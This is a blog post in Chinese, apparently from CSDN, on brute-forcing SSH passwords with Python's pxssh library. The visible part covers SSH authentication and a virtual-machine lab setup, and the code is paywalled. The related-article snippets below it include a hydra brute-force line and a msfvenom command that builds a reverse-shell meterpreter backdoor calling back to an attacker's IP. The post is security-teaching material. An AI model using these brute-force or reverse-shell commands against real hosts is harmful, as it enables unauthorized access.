python—用Pxssh暴力破解SSH密码

原创 已于 2024-07-10 16:20:23 修改 · 1.5k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #ssh连接 #pxssh

于 2018-11-29 18:37:57 首次发布

用Pxssh暴力破解SSH密码

参考于《python绝技 运用python成为顶级黑客》

1. SSH相关介绍:

SSH是主要用于为远程登陆会话提供安全保障的协议(即实现远程命令行操作)
SSH可提供两种级别的安全验证:

1.基于口令的安全验证:
通过帐号和密码登录到远程主机
攻击方式:暴力破解 / “中间人”攻击

这里需要说明一下:在暴力破解时,输错多次密码会断掉连接,这时重新连接即可,有的服务器错误次数太多了还会锁IP,那这方法就不行了。(之前有考虑过用python改IP再重新连接,但由于无法接收到服务器回弹的ssh连接,就放弃这种操作了。)

2.基于密匙的安全验证:
需要依靠密匙,也就是你必须为自己创建一对密匙,并把公用密匙放在需要访问的服务器上。如果你要连接到SSH服务器上,客户端软件就会向服务器发出请求,请求用你的密匙进行安全验证。
攻击方式:暴力破解(网络上可以下载所有的1024位/2048位密钥,但量太大,据一位大佬说:这个破解就不要去想了,难度极大,并且当前大部分都是使用基于密匙的安全验证)

2. 环境搭建:

我们可以再虚拟机上搭建ssh服务,用主机进行连接
1.安装ssh服务:
redhat,fedora,centos等系列linux发行版:sudo yum install sshd
debian,ubuntu,linux mint等系列的linux发行版:sudo apt-get install sshd
2.开启ssh服务:sudo service sshd start
3.查看ssh服务状态的命令:sudo service sshd status
4.ssh服务配置文件:/etc/ssh/sshd_config
注意配置文件的以下参数:

#LoginGraceTime 2m      #限制用户必须在指定的时限(单位秒)内认证成功,0 表示无限制
PermitRootLogin yes	 #是否允许 root 登录,默认为no,请修改为yes,注意去掉前面的‘#’才能生效
#MaxAuthTries 6         #指定每个连接最大允许的认证次数
#MaxSessions 10        #最大保持连接数
#PubkeyAuthentication yes       #是否支持公钥安全验证

如果ssh远程连接不上,请确认防火墙是否放行ssh端口,和配置文件中PermitRootLogin yes允许 root 登录是否生效
5.连接ssh:
主机cmd下执行:ssh user@IP
例如:ssh root @ 127.0.0.1

最低0.47元/天 解锁文章

200万优质内容无限畅学
SSH密码暴力破解
Marsper的博客
11-16 4095
SSH密码暴力破解 海德拉( Hydra ):希腊神话中的九头蛇,是西方的神话生物,在古希暗神话中出现最为频繁。传说它拥有九颗头,其中一颗头要是被斩断,立刻又会生出两颗头来。 hydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 1.1指定用户破解 打开kali虚拟机 输入hydra -h 查看帮助 Examples: hydra -l user -P passlist.txt ftp
SSH暴力破解Python-pxssh实现
forbidd3n,keep going
08-14 5228
最近在看《Violent Python》,记录一些代码实现。 0x00 SSH暴力破解Python-pexssh实现 Pxssh是一个包含了pexpect库的专用脚本,它能用预先写好的login()、logout()、prompt()等函数直接与SSH进行交互。 简单示例: import pxssh def send_command(s, cmd): s.sendline(c
通过 Pxssh 暴力破解 SSH 密码
zwlww1的博客
01-05 718
#!/usr/bin/python #coding=utf-8 from pexpect import pxssh import optparse import time from threading import * #最大连接数被设置为5,在每个thread启动时注册一个信号量,在connect函数结束时注销这个信号量,这样同时存在的线程数量就被控制为5个。 maxC
Python武器库开发-武器库篇之SSH服务暴力破解(五十四)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-14 1181
SSH(Secure Shell)是一种加密的网络协议,用于在不安全的网络上提供安全的远程登录和文件传输功能。SSH可以在客户端和服务器之间建立安全的通信连接,确保通信数据的机密性和完整性。SSH服务的主要功能包括:远程登录:用户可以通过SSH协议在远程主机上执行命令,就像在本地主机上操作一样。文件传输:SSH可以方便地传输文件和目录,支持上传和下载操作。端口转发:SSH可以在远程主机和本地主机之间建立安全的端口转发通道,用于安全访问远程主机上的服务。
一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)
最新发布
bigbangbangbang1的博客
06-10 1119
SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。
Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)
谢公子的博客
11-03 4039
目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux  python 2.7.13 暴力破解SSH口令 Pxssh是pexpect库的ssh专用脚本,他能用预先写好的 login()、logout() 和 prompt() 等函数直接与SSH进行交互 。对于login()函数,如果执行成功则不会抛出异常,将显示消息表示密码已经找到并把表示密码已找到...
ssh暴力破解主机密码
08-09
ssh暴力破解windows服务器密码,绝对详细的教程,立即可以使用
手把手教你用Python进行SSH暴力破解
pdcfighting的博客
08-31 2202
点击上方“Python爬虫与数据挖掘”,进行关注回复“书籍”即可获赠Python从入门到进阶共10本电子书今日鸡汤青冥浩荡不见底,日月照耀金银台。暴力破解属于密码破解的一种,也是最常见的...
ssh暴力破解
有小小的远大抱负
04-25 1869
这里因为演示环境,直接输入几个简单的密码字符到test里面。最终可以看到暴力破解密码成功,密码是123456。下一步使用medusa进行暴力破解
SSH暴力破解
xigua2540的博客
06-12 2647
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口。少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名。SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;
暴力破解SSHPython源码
06-14
# sshBrute # ssh爆破工具 ## * 用途 基于字典文件破解ssh账号密码 ## * 依赖 pip install paramiko ## * 使用方法: Usage: sshBrute.py [options] host Options: -h, --help show this help message and exit -p PORT, --port=PORT port, default 22 -u USERNAME, --username=USERNAME username, default root(Linux) -f PWD_PATH, --file=PWD_PATH password dict file,default dict/password.txt ## * 其它 * sshBrute.py ,单线程实现 * sshBruteV2.py ,多线程实现
Ssh-Ninja:适用于Bruteforce安全Shell协议的Python脚本
04-05
我使用pxssh是基于Pexpect的Python模块,用于建立SSH连接。 它的类扩展了pexpect.spawn以专门设置SSH连接。 是一个专门的模块,提供了直接与SSH会话进行交互的特定方法,例如login() , logout()和prompt(&#41...
Python 开发一个帐号密码暴力破解程序
weixin_46703850的博客
09-22 3815
支持FTP、MySQL、SSH、Sqlserver协议 功能:每次破解可以设置时间间隔,破解中断下次破解可以读取历史继续上一次的破解。支持多线程,可自行设置线程数.
ssh协议密码暴力破解、基于表单的暴力破解暴力破解----验证码绕过(on client)、暴力破解—验证码绕过(on server)
dyx0910的博客
05-12 2859
ssh协议密码暴力破解、基于表单的暴力破解暴力破解----验证码绕过(on client)、暴力破解—验证码绕过(on server)
Python模块之pxssh
weixin_30352191的博客
01-04 1312
pxssh模块用于在pythonssh远程连接,执行命令,返回结果,但注意不支持Windows系统 #!/usr/bin/env python #-*- coding:utf-8 -*- from pexpect import pxssh host = "172.16.1.15" username = "root" password = "123456" cmd1 ...
Python3小工具——暴力破解ssh
qq_43934844的博客
12-14 467
利用pxssh库进行暴力破解ssh。二、演示一下的利用效果。
python SSH暴力破解工具
听雨轩
01-03 396
一个暴力破解SSHPython代码。来自于 oschina     #!/usr/bin/env python #-*-coding = UTF-8-*- #author@:dengyongkai #blog@:blog.sina.com.cn/kaiyongdeng import sys import os import time #from threadin...
Python批量修改SSH密码脚本实现
"这篇文章主要展示了如何使用Python编程语言批量修改SSH密码,特别是在结合Excel表格处理大量账户信息的场景下。作者提供了详细的示例代码,并提到了两种在Ubuntu系统中修改密码的方法。" 在运维工作中,有时我们...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值